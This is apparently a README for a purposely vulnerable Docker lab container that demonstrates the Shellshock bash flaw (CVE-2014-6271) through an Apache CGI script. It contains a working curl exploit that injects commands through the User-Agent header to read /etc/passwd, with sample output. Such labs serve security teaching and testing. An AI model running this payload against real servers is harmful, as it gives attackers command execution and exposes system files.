Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock# Vulnerability as a Service - CVE 2014-6271
A Debian (Buster) Linux system with a vulnerable version of bash and a web application to showcase CVS-2014-6271, a.k.a. Shellshock.
# Overview
This docker container is based on Debian Buster and has been modified to use a vulernable version of Bash (bash_4.2:2b:dfsg-0.1).
A web application is available via Apache 2 and serves a CGI script which runs shell commands.
# Usage
Install the container with `docker pull hmlio/vaas-cve-2014-6271`
Run the container with a port mapping `docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271`
You should be able to access the web application at http://your-ip:8080/.
# Exploitation
The web application/vulnerable bash version can be exploited as shown below:
```sh
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
```
# Credits
The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse.
For further details please see <a href="https://www.vulnhub.com/entry/sokar-1,113/" target="_blank">https://www.vulnhub.com/entry/sokar-1,113/</a>.
[4.0K] /data/pocs/9f4266ddbf647af4cea6bf20f1e156ba09cc9c33
├── [1.2K] Dockerfile
├── [ 692] index.html
├── [ 18K] LICENSE.md
├── [1.2K] README.md
└── [ 266] stats
0 directories, 5 files